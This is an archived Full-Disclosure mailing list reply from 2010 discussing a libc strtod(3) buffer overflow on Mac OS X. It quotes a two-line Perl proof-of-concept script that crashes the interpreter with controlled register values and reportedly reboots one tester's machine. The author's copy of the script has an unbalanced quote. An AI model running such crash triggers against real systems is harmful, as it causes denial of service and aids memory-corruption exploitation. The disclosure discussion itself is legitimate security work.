lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <4B4B800D.2040301@securityreason.com>
Date: Mon, 11 Jan 2010 20:46:21 +0100
From: Maksymilian Arciemowicz <cxib@...urityreason.com>
To: Joshua Levitsky <jlevitsk@...hie.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: MacOS X 10.5/10.6 libc/strtod(3) buffer
	overflow

I have not checked this issue in macos 10.4. In MacOS 10.1 does not
work. But the perl script (in macos 10.5)

Chujwamwmuzg.pl ---
#!/usr/local/bin/perl
printf "% 0.4194310f, 0x0.0x41414141;
Chujwamwmuzg.pl ---

will crash with
esi = 0x41414141
edi = 0x15

Other bugs in libc also work on new versions of macos. Example overflow
in FTSENT structure

http://securityreason.com/achievement_securityalert/60
http://securityreason.com/achievement_securityalert/68

We confirmed this issue in MacOS 10.1.


> Joshua Levitsky wrote:
> and it then rebooted my mac :)
> 
> On Mon, Jan 11, 2010 at 1:57 PM, Joshua Levitsky <jlevitsk@...hie.com
> <mailto:jlevitsk@...hie.com>> wrote:
> 
>     The below hosed my terminal session on 10.4.11... I did this in a
>     >console login so don't have the results.. You need? or is dropping
>     me to a blue screen and lack of system response good? 
> 
>     #!/usr/local/bin/perl
>     printf "%0.4194310f", 0x0.0x41414141;
> 
> 
>     Perl will crash with
>     esi = 0x41414141
>     edi = 0x15
> 
>     -Josh

-- 
Best Regards,
------------------------
pub   1024D/A6986BD6 2008-08-22
uid                  Maksymilian Arciemowicz (cxib)
<cxib@...urityreason.com>
sub   4096g/0889FA9A 2008-08-22

http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg


Download attachment "signature.asc" of type "application/pgp-signature" (164 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ